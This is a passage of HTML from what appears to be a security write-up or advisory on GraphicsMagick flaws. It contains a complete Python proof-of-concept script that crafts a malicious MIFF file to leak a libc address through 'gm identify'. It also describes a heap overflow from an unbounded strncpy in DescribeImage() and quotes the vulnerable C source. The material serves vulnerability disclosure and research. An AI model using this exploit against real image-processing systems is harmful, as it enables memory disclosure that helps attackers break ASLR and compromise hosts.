output_leak.index(&#8220;Montage:&#8221;) &#8211; 3      leak = output_leak[priority_offset:montage_offset]      if &#8220;0x00000000&#8221; in leak:          log.info(&#8220;Unlucky run. Value corrupted by StringToList&#8221;)          exit()      main_arena_leak = u64(leak.ljust(8, &#8220;x00&#8221;))      log.info(&#8220;Main Arena Leak: 0x%x&#8221; % main_arena_leak)      libc_base = main_arena_leak &#8211; libc_main_arena_entry_offset      log.info(&#8220;libc Base: 0x%x&#8221; % libc_base)    if __name__ == &#8220;__main__&#8221;:      main()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b8242621114-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b8242621114-39\">39<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-1\"><span class=\"crayon-c\">#!\/usr\/bin\/python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-2\"><span class=\"crayon-c\"># GraphicsMagick IPTC Profile libc Leak<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-4\"><span class=\"crayon-st\">from<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pwn <\/span><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-6\"><span class=\"crayon-v\">directory<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;DIR&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-7\"><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;id=ImageMagick&nbsp;&nbsp;version=1.0nclass=DirectClass&nbsp;&nbsp;matte=Falsen&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;columns=1&nbsp;&nbsp;rows=1&nbsp;&nbsp;depth=16nscene=1nmontage=1&#215;1+0+0nprofil&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;e-iptc=&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;nx0cn:x1a&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;nx00&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;nx00xbexbexbexbexbexben&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-13\"><span class=\"crayon-v\">output<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;readexploit.miff&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-14\"><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-16\"><span class=\"crayon-c\">#libc_main_arena_entry_offset = 0x3c4ba8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-17\"><span class=\"crayon-v\">libc_main_arena_entry_offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x3c4b98<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-19\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;AAA&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x1c&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x00&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">chr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">p16<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">endian<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;big&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">directory<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">file<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;w&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">process<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">executable<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;gm&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;identify&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;-verbose&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">output_leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">recvall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priority_offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output_leak<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">index<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Priority:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">montage_offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output_leak<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">index<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Montage:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output_leak<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">priority_offset<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">montage_offset<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0x00000000&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">log<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Unlucky run. Value corrupted by StringToList&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">main_arena_leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">u64<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ljust<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x00&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">log<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Main Arena Leak: 0x%x&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">main_arena_leak<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">libc_base<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">main_arena_leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">libc_main_arena_entry_offset<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-36\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">log<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;libc Base: 0x%x&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libc_base<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-37\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b8242621114-38\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;__main__&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b8242621114-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0056 seconds] -->  <\/p>\n<p><strong>Heap Overflow<\/strong><br \/> GraphicsMagick is vulnerable to a heap overflow vulnerability found in <code><em>DescribeImage()<\/em><\/code> function of the magick\/describe.c file.<\/p>\n<p>The call to <code><em>strncpy<\/em><\/code> on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59f8f774244bc287208740\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">C<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 844       \/*  845         Display visual image directory.  846       *\/  847       image_info=CloneImageInfo((ImageInfo *) NULL);  848       (void) CloneString(&amp;image_info-&gt;size,&#8221;64&#215;64&#8243;);  849       (void) fprintf(file,&#8221;  Directory:n&#8221;);  850       for (p=image-&gt;directory; *p != &#8216;\u0000&#8217;; p++)  851         {  852           q=p;  853           while ((*q != &#8216;n&#8217;) &amp;&amp; (*q != &#8216;\u0000&#8217;))  854             q++;  855           (void) strncpy(image_info-&gt;filename,p,q-p);  856           image_info-&gt;filename[q-p]=&#8217;\u0000&#8217;;  857           p=q;  &#8230;  880         }  881       DestroyImageInfo(image_info);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bc287208740-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bc287208740-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bc287208740-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bc287208740-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bc287208740-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bc287208740-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bc287208740-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bc287208740-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bc287208740-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bc287208740-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bc287208740-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bc287208740-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bc287208740-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bc287208740-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bc287208740-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bc287208740-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bc287208740-17\">17<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bc287208740-1\"><span class=\"crayon-cn\">844<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bc287208740-2\"><span class=\"crayon-c\">845&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Display visual image directory.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bc287208740-3\"><span class=\"crayon-c\">846&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bc287208740-4\"><span class=\"crayon-cn\">847<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">image_info<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">CloneImageInfo<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ImageInfo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bc287208740-5\"><span class=\"crayon-cn\">848<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">(<\/span><span 